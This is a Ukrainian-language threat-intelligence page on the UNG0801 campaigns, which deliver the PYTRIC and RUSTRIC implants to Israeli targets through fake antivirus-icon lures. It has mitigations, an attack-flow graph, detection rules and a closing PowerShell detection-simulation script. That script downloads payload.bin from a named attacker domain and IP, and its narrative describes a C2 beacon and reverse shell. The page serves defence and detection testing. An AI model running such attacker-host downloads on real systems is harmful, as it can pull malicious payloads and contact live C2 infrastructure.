Стежити
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Звіт описує дві пов’язані кампанії, які використовують шкідливі PDF та Word документи для доставки завантажувальних файлів, що імітують іконки антивірусів та націлені на ізраїльські організації. Один трек доставляє PYTRIC, упаковану в PyInstaller Python закладку, тоді як інший доставляє RUSTRIC, закладку на базі Rust, що запускається через документ Word з макросом. Обидва завантажувальні файли збирають деталі хоста, виконують системні команди та перевіряють встановлене програмне забезпечення безпеки; PYTRIC додатково включає руйнівні функції. Доставка здійснюється через фішингові додатки та посилання в хмарі (включаючи Dropbox), з використанням Telegram для командування та контролю.
Розслідування
Лабораторії SEQRITE проаналізували початкові фішингові приманки, витягнули вбудовані макроси та відновили ланцюг завантаженого файлу. PYTRIC був підтверджений як пакет PyInstaller з процедурами виявлення файлів та їх видалення, аналітики спостерігали облікові дані бота Telegram, пов’язані з Backup2040. RUSTRIC був профільований як двійковий файл Rust, що перевіряє двадцять вісім продуктів антивірусного захисту та запускає шістнадцяткове закодований завантажувальний файл через WMI. Аналіз інфраструктури пов’язав доставлення з посиланням на Dropbox та доменом, що розв’язується на IP-адресу, на яку раніше було зорієнтовано netvigil.org.
Пом’якшення
Навчіть користувачів обережно ставитися до небажаних вкладених файлів PDF та Word, особливо до файлів, представлених як інструменти безпеки або утиліти, пов’язані з антивірусом. Налаштуйте безпеку електронної пошти на блокування документів із макросами та на встановлення прапорів або обмеження URL-адрес, що посилаються на хостінг у хмарі, використаний для доставки завантажувальних файлів. На кінцевих точках моніторте виконання PyInstaller, створення незвичайних процесів WMI і підозріле викликання вбудованих утиліт, таких як whoami, hostname та nslookup. Блокування виявлених зловмисних доменів та IP-адрес може додатково зірвати шлях зараження.
Відповідь
Якщо діяльність виявлена, ізолюйте уражену систему, збережіть змінну інформацію і зберіть шкідливі документи для хеш-тріажу. Зупиніть підозрілі процеси, що викликані WMI, і видаліть завантажувальні файли з загальнозавантажувальних локацій, таких як папка Завантаження. Виконайте судовий аналіз для перевірки видалення файлів або активності їх очищення, скиньте потенційно розкриті облікові дані та моніторте подальші комунікації Telegram C2.
“graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef file fill:#c2f0c2 classDef malware fill:#ff9999 classDef process fill:#dddddd classDef operator fill:#ff9900 %% Action nodes attack_phishing[“<b>Дія</b> – <b>T1566.001 Фішинг: Спірфішінг Вкладення</b><br />Жертви отримують електронну пошту зі зловмисним вкладенням PDF або Word файлу.”] class attack_phishing action attack_user_exec[“<b>Дія</b> – <b>T1204.002 Виконання користувачем: Зловмисний файл</b><br />Жертва відкриває зловмисний PDF або Word документ, викликаючи виконання.”] class attack_user_exec action attack_ingress_transfer[“<b>Дія</b> – <b>T1105 Передача інструментів вхідних потоків</b><br />PDF файл інструктує жертву завантажити другий стадію завантаження з Dropbox.”] class attack_ingress_transfer action attack_exec_python[“<b>Дія</b> – <b>T1059.006 Командний інтерпретатор та сценарій: Python</b><br />PYTRIC (виконуваний файл Python з упакуванням через PyInstaller) запускається на хості.”] class attack_exec_python action attack_exec_vb[“<b>Дія</b> – <b>T1059.005 Командний інтерпретатор та сценарій: Visual Basic</b><br />Макрос VBA у документі Word декодує та записує кінцеве навантаження на диск.”] class attack_exec_vb action attack_masquerade[“<b>Дія</b> – <b>T1036.005 Маскування: Відповідність легітимної назви або місця</b><br />Бінарні файли називаються так, щоб імітувати довірені антивірусні вендори (Check Point, SentinelOne).”] class attack_masquerade action attack_obfuscate[“<b>Дія</b> – <b>T1027 Обфусковані файли або інформація</b><br />Навантаження закодовано у шістнадцятковому форматі у макросі, щоб уникнути статичного виявлення.”] class attack_obfuscate action attack_proxy_exec[“<b>Дія</b> – <b>T1218 Виконання системного бінарного файлу з проксі</b><br />Легітимні бінарні файли (wmic, whoami.exe, hostname.exe, nslookup.exe) використовуються для виконання команд.”] class attack_proxy_exec action attack_wmi[“<b>Дія</b> – <b>T1047 Інструментарій управління Windows</b><br />RUSTRIC запускається через WMI (Win32_Process.Create).”] class attack_wmi action attack_sw_discovery[“<b>Дія</b> – <b>T1518.001 Виявлення безпекового програмного забезпечення</b><br />RUSTRIC перераховує 28 антивірусних/EDR продуктів, перевіряючи відомі шляхи та процеси.”] class attack_sw_discovery action attack_process_discovery[“<b>Дія</b> – <b>T1057 Виявлення процесів</b><br />RUSTRIC перераховує запущені процеси на кінцевому пристрої.”] class attack_process_discovery action attack_c2_web[“<b>Дія</b> – <b>T1071.001 Протокол прикладного рівня: веб-протоколи</b><br />Імпланти спілкуються з C2 через стандартні веб-протоколи.”] class attack_c2_web action attack_c2_port[“<b>Дія</b> – <b>T1571 Нестандартний порт</b><br />Комунікація відбувається через HTTPS на порту 443.”] class attack_c2_port action attack_subvert_trust[“<b>Дія</b> – <b>T1553 Підрив контролю довіри</b><br />Бінарні файли маскуються під іконки/бренди легітимних вендорів безпеки.”] class attack_subvert_trust action attack_impair_defenses[“<b>Дія</b> – <b>T1562.011 Підрив захисту: Імітація безпекових попереджень</b><br />Фальшиві безпекові попередження підсилюють довірений вигляд зловмисних бінарних файлів.”] class attack_impair_defenses action %% Tool nodes tool_wmic[“<b>Інструмент</b> – <b>Назва</b>: wmic<br /><b>Опис</b>: Командний рядок інструментарію управління Windows.”] class tool_wmic tool tool_whoami[“<b>Інструмент</b> – <b>Назва</b>: whoami.exe<br /><b>Опис</b>: Виводить ім’я поточного користувача.”] class tool_whoami tool tool_hostname[“<b>Інструмент</b> – <b>Назва</b>: hostname.exe<br /><b>Опис</b>: Повертає ім’я хоста машини.”] class tool_hostname tool tool_nslookup[“<b>Інструмент</b> – <b>Назва</b>: nslookup.exe<br /><b>Опис</b>: Утиліта запиту DNS.”] class tool_nslookup tool %% File nodes file_malicious_pdf[“<b>Файл</b> – <b>Назва</b>: Зловмисний PDF<br /><b>Призначення</b>: Канал доставки для початкової інструкції.”] class file_malicious_pdf file file_malicious_word[“<b>Файл</b> – <b>Назва</b>: Зловмисний Word<br /><b>Призначення</b>: Містить макрос VBA, який декодує кінцеве навантаження.”] class file_malicious_word file file_dropbox[“<b>Файл</b> – <b>Назва</b>: Посилання на завантаження Dropbox<br /><b>Призначення</b>: Зберігає другий стадію виконуваного файлу PYTRIC.”] class file_dropbox file %% Malware nodes malware_pytric[“<b>Шкідливе ПЗ</b> – <b>Назва</b>: PYTRIC<br /><b>Опис</b>: Шкідливе ПЗ на базі Python, упаковане PyInstaller.”] class malware_pytric malware malware_rustric[“<b>Шкідливе ПЗ</b> – <b>Назва</b>: RUSTRIC<br /><b>Опис</b>: Компонент, виконуваний через WMI, використовуваний для виявлення та C2.”] class malware_rustric malware %% Operator node for branching op_and1((“AND”)) class op_and1 оператор %% Connections attack_phishing u002du002d>|доставляє| file_malicious_pdf attack_phishing u002du002d>|доставляє| file_malicious_word file_malicious_pdf u002du002d>|відкрито жертвою| attack_user_exec file_malicious_word u002du002d>|відкрито жертвою| attack_user_exec attack_user_exec u002du002d>|тригер| attack_ingress_transfer attack_ingress_transfer u002du002d>|завантажує| file_dropbox file_dropbox u002du002d>|надає| malware_pytric attack_user_exec u002du002d>|виконує| attack_exec_vb attack_exec_vb u002du002d>|записує| malware_rustric attack_ingress_transfer u002du002d>|виконує| attack_exec_python attack_exec_python u002du002d>|запускає| malware_pytric malware_pytric u002du002d>|застосовує| attack_obfuscate malware_pytric u002du002d>|застосовує| attack_masquerade attack_obfuscate u002du002d>|підтримує| attack_proxy_exec attack_masquerade u002du002d>|підтримує| attack_proxy_exec attack_proxy_exec u002du002d>|викликає| tool_wmic attack_proxy_exec u002du002d>|викликає| tool_whoami attack_proxy_exec u002du002d>|викликає| tool_hostname attack_proxy_exec u002du002d>|викликає| tool_nslookup tool_wmic u002du002d>|запускає| attack_wmi attack_wmi u002du002d>|виконує| malware_rustric malware_rustric u002du002d>|здійснює| attack_sw_discovery malware_rustric u002du002d>|здійснює| attack_process_discovery attack_sw_discovery u002du002d>|живить| attack_c2_web attack_process_discovery u002du002d>|живить| attack_c2_web attack_c2_web u002du002d>|використовує| attack_c2_port attack_c2_web u002du002d>|включає| attack_subvert_trust attack_c2_web u002du002d>|включає| attack_impair_defenses %% Styling class attack_phishing,attack_user_exec,attack_ingress_transfer,attack_exec_python,attack_exec_vb,attack_masquerade,attack_obfuscate,attack_proxy_exec,attack_wmi,attack_sw_discovery,attack_process_discovery,attack_c2_web,attack_c2_port,attack_subvert_trust,attack_impair_defenses action class tool_wmic,tool_whoami,tool_hostname,tool_nslookup tool class file_malicious_pdf,file_malicious_word,file_dropbox file class malware_pytric,malware_rustric malware class op_and1 оператор “
Потік атаки
Детекції
Можливе зловживання Telegram як каналу командування і контролю (через dns_query)
Переглянути
Можлива інфільтрація/експільтрація даних/С2 через сторонні сервіси/інструменти (через dns)
Переглянути
Можливе системне перелічення (через cmdline)
Переглянути
IOC (SourceIP) для виявлення: UNG0801: Відстеження кластерів загроз, одержимих підробкою іконок AV, націлених на Ізраїль
Переглянути
IOC (DestinationIP) для виявлення: UNG0801: Відстеження кластерів загроз, одержимих підробкою іконок AV, націлених на Ізраїль
Переглянути
IOC (HashSha256) для виявлення: UNG0801: Відстеження кластерів загроз, одержимих підробкою іконок AV, націлених на Ізраїль
Переглянути
C2 комунікація із використанням певного домену та IP [З’єднання в мережі Windows]
Переглянути
Виявлення шкідливого PDF та виконання навантаження в операції IconCat [Cтворення процесу Windows]
Переглянути
Виконання симуляції
Передумова: Телеметрія та перевірка базового рівня повинні були пройти.
Обґрунтування: Цей розділ деталізує точне виконання техніки противника (TTP), розробленої для запуску правила детекції. Команди та оповідання ПОВИННІ безпосередньо відображати виявлені TTP та націлені на генерацію точної телеметрії, очікуваної логікою виявлення. Абстрактні або не пов’язані приклади призведуть до діагнозу.
-
Опис атаки та команди:
Противник заздалегідь зареєстрував домен stratioai.org та налаштував його для розв’язування на 159.198.68.25 (компрометований VPS). Використовуючи однорядковий сценарій PowerShell, вони ініціюють маяк C2, що завантажує невелике навантаження, а потім підтримує стійку зворотну оболонку. Вихідне з’єднання здійснюється через HTTPS (порт 443), щоб зливатись із звичайним трафіком, але міжмережевий екран реєструє IP-адресу призначення та DNS-запит, що відповідає правилу sigma. -
Скрипт регресійного тесту:
# ------------------------------------------------- # Симульований маяк C2 для перевірки виявлення # ------------------------------------------------- # 1. Розв'язати шкідливий домен (викликає DNS-запит) $maliciousDomain = "stratioai.org" $resolved = [System.Net.Dns]::GetHostAddresses($maliciousDomain) Write-Host "Resolved $maliciousDomain to $($resolved -join ', ')" # 2. Встановити HTTPS-з'єднання з шкідливою IP (C2) $maliciousIP = "159.198.68.25" $url = "https://$maliciousDomain/payload.bin" try { $response = Invoke-WebRequest -Uri $url -UseBasicParsing -TimeoutSec 10 Write-Host "C2 request succeeded, size: $($response.ContentLength) bytes" } catch { Write-Error "C2 request failed: $_" } # 3. OPTIONAL: Залишити канал живим на 30 секунд Start-Sleep -Seconds 30 # ------------------------------------------------- -
Команди очищення:
# Видалити всі тимчасові файли (в цьому скрипті не створено) # Очистити кеш DNS, щоб уникнути випадкового повторного використання ipconfig /flushdns Write-Host "Очистка завершена."